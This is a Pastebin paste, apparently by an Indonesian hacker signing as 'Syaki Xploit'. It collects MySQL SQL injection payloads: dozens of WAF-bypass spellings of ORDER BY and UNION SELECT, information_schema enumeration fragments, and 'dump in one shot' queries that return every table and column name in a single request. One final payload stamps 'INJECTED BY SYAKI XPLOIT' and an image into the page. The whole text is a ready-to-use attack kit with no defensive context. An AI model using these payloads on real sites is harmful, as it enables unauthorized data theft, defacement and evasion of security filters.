API tools faq
paste
Advertisement
syaki

DIOS.SYAKI-XPLOIT

syaki
Jul 19th, 2019
123
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.22 KB | None | 0 0
raw download clone embed print report
  1. Dios pada bagian Order by :
  2.  
  3.  
  4. /**/ORDER/**/BY/**/
  5. /*!order*/+/*!by*/
  6. /*!ORDER BY*/
  7. /*!50000ORDER BY*/
  8. /*!50000ORDER*//**//*!50000BY*/
  9. /*!12345ORDER*/+/*!BY*/
  10.  
  11. Dios pada bagian Union Select :
  12.  
  13. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  14. '+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/
  15. 'And/**/.0union/*%26*/distinctROW+select+
  16. '+union(select(1),(2),(3),(4),(5),(6),(7),(8),(9))
  17. %55nion(%53elect 1,2,3)-- -
  18. +union+distinct+select+
  19. +union+distinctROW+select+
  20. /**//*!12345UNION SELECT*//**/
  21. /*!%55NiOn*/ /*!%53eLEct*/
  22. %55nion(%53elect 1,2,3)-- -
  23. +union+distinct+select+
  24. +union+distinctROW+select+
  25. /**//*!50000UNION SELECT*//**/
  26. /**/UNION/**//*!50000SELECT*//**/
  27. /*!50000UniON SeLeCt*/
  28. union /*!50000%53elect*/
  29. +#uNiOn+#sEleCt
  30. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  31. /*!%55NiOn*/ /*!%53eLEct*/
  32. /*!u%6eion*/ /*!se%6cect*/
  33. +un/**/ion+se/**/lect
  34. uni%0bon+se%0blect
  35. %2f**%2funion%2f**%2fselect
  36. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  37. REVERSE(noinu)+REVERSE(tceles)
  38. /*--*/union/*--*/select/*--*/
  39. union (/*!/**/ SeleCT */ 1,2,3)
  40. /*!union*/+/*!select*/
  41. union+/*!select*/
  42. /**/union/**/select/**/
  43. /**/uNIon/**/sEleCt/**/
  44. /**//*!union*//**//*!select*//**/
  45. /*!uNIOn*/ /*!SelECt*/
  46. +union+distinct+select+
  47. +union+distinctROW+select+
  48. +UnIOn%0d%0aSeleCt%0d%0a
  49. UNION/*&test=1*/SELECT/*&pwn=2*/
  50. un?+un/**/ion+se/**/lect+
  51. +UNunionION+SEselectLECT+
  52. +uni%0bon+se%0blect+
  53. %252f%252a*/union%252f%252a /select%252f%252a*/
  54. /%2A%2A/union/%2A%2A/select/%2A%2A/
  55. %2f**%2funion%2f**%2fselect%2f**%2f
  56. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  57. /*!UnIoN*/SeLecT+
  58. Union Select by PASS with Url Encoded Method:
  59. %55nion(%53elect)
  60. union%20distinct%20select
  61. union%20%64istinctRO%57%20select
  62. union%2053elect
  63. %23?%0auion%20?%23?%0aselect
  64. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  65. %55nion %53eLEct
  66. u%6eion se%6cect
  67. unio%6e %73elect
  68. unio%6e%20%64istinc%74%20%73elect
  69. union%23pawpawpawpaw%0aselect
  70. /**/UNION/**/SELECT/**/
  71. uni%6fn distinct%52OW s%65lect
  72. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
  73.  
  74. Dios pada bagian Information_shema.tables :
  75.  
  76. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  77. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  78. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  79. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  80. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  81. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  82.  
  83. Dios pada bagian Concat :
  84.  
  85. CoNcAt()
  86. concat()
  87. CON%08CAT()
  88. CoNcAt()
  89. %0AcOnCat()
  90. /**//*!12345cOnCat*/
  91. /*!50000cOnCat*/(/*!*/)
  92. unhex(hex(concat(table_name)))
  93. unhex(hex(/*!12345concat*/(table_name)))
  94. unhex(hex(/*!50000concat*/(table_name)))
  95.  
  96. Dios pada bagian Group_Concat :
  97.  
  98. /*!group_concat*/()
  99. gRoUp_cOnCAt()
  100. group_concat(/*!*/)
  101. group_concat(/*!12345table_name*/)
  102. group_concat(/*!50000table_name*/)
  103. /*!group_concat*/(/*!12345table_name*/)
  104. /*!group_concat*/(/*!50000table_name*/)
  105. /*!12345group_concat*/(/*!12345table_name*/)
  106. /*!50000group_concat*/(/*!50000table_name*/)
  107. /*!GrOuP_ConCaT*/()
  108. /*!12345GroUP_ConCat*/()
  109. /*!50000gRouP_cOnCaT*/()
  110. /*!50000Gr%6fuP_c%6fnCAT*/()
  111. unhex(hex(group_concat(table_name)))
  112. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  113. unhex(hex(/*!12345group_concat*/(table_name)))
  114. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  115. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  116. unhex(hex(/*!50000group_concat*/(table_name)))
  117. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  118. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  119. convert(group_concat(table_name)+using+ascii)
  120. convert(group_concat(/*!table_name*/)+using+ascii)
  121. convert(group_concat(/*!12345table_name*/)+using+ascii)
  122. convert(group_concat(/*!50000table_name*/)+using+ascii)
  123. CONVERT(group_concat(table_name)+USING+latin1)
  124. CONVERT(group_concat(table_name)+USING+latin2)
  125. CONVERT(group_concat(table_name)+USING+latin3)
  126. CONVERT(group_concat(table_name)+USING+latin4)
  127. CONVERT(group_concat(table_name)+USING+latin5)
  128.  
  129.  
  130. Dios collection #############
  131.  
  132. concat_ws('<br>','AZZATSSINS',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))
  133.  
  134. (select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.schemata)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,schema_name))))x)
  135.  
  136. (select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.tables)%20where%20(table_schema=database())%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_name))))x)
  137.  
  138. concat(@c:=0x00,if((select%20count(*)%20from%20information_schema.columns%20where%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)
  139.  
  140. concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)
  141.  
  142. concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/
  143.  
  144. export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
  145.  
  146. (select+concat(0x3c666f6e7420666163653d43616d627269612073697a653d323e72306f74404833583439203a3a20,version(),0x3c666f6e7420636f6c6f723d7265643e3c62723e,0x446174616261736573203a7e205b,(Select+count(Schema_name)from(information_Schema.schemata)),0x5d3c62723e5461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)),0x5d3c62723e436f6c756d6e73203a7e205b,(Select+count(column_name)from(information_Schema.columns)),0x5d3c62723e,@)from(select(@:=0x00),(@db:=0),(@db_nr:=0),(@tbl:=0),(@tbl_nr:=0),(@col_nr:=0),(select(@)from(information_Schema.columns)where(@)in(@:=concat(@,if((@db!=table_schema),concat((@tbl_nr:=0x00),0x3c666f6e7420636f6c6f723d7265643e,LPAD(@db_nr:=@db_nr%2b1,2,0x20),0x2e20,@db:=table_schema,0x2020202020203c666f6e7420636f6c6f723d707572706c653e207b205461626c6573203a7e205b,(Select+count(table_name)from(information_schema.tables)where(table_schema=@db)),0x5d7d203c2f666f6e743e3c2f666f6e743e),0x00),if((@tbl!=table_name),concat((@col_nr:=0x00),0x3c646976207374796c653d70616464696e672d6c6566743a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD(@tbl_nr:=@tbl_nr%2b1,3,0x0b),%200x2e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b2020436f6c756d6e73203a7e20205b,(Select+count(column_name)from(information_Schema.columns)where(table_name=@tbl)),0x5d202f203c666f6e7420636f6c6f723d626c61636b3e205265636f726473203a7e205b,(Select+if%20null(table_rows,0x30)+from+information_schema.tables+where+table_name=@tbl),0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e),0x00),concat(0x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD(@col_nr:=@col_nr%2b1,3,0x0b),0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e)))))x)
  147.  
  148. +and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+
  149.  
  150. (select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  151.  
  152. (select(@x)from(select(@x:=0x00),(@nr:=0),(@tbl:=0x0),(select(0)from(information_schema.tables)where(table_schema=database())and(0x00)in(@x:=concat_ws(0x20,@x,lpad(@nr:=@nr%2b1,3,0x0b),0x2e20,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e203a3a3a3a3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20207b2020436f6c756d6e73203a3a205b3c666f6e7420636f6c6f723d7265643e,(select+count(*)+from+information_schema.columns+where+table_name=@tbl),0x3c2f666f6e743e5d20207d3c2f666f6e743e,0x3c62723e))))x)
  153.  
  154. (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
  155.  
  156. (/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*)%20from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@))
  157.  
  158.  
  159.  
  160. #Dios Waff pennywise
  161. concat_ws('<br>','INJECTED BY SYAKI XPLOIT','<br>','<img+src="https://i.ibb.co/6XfGMBM/1563157653897-picsay.pngm"height="500px"width="500px">',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!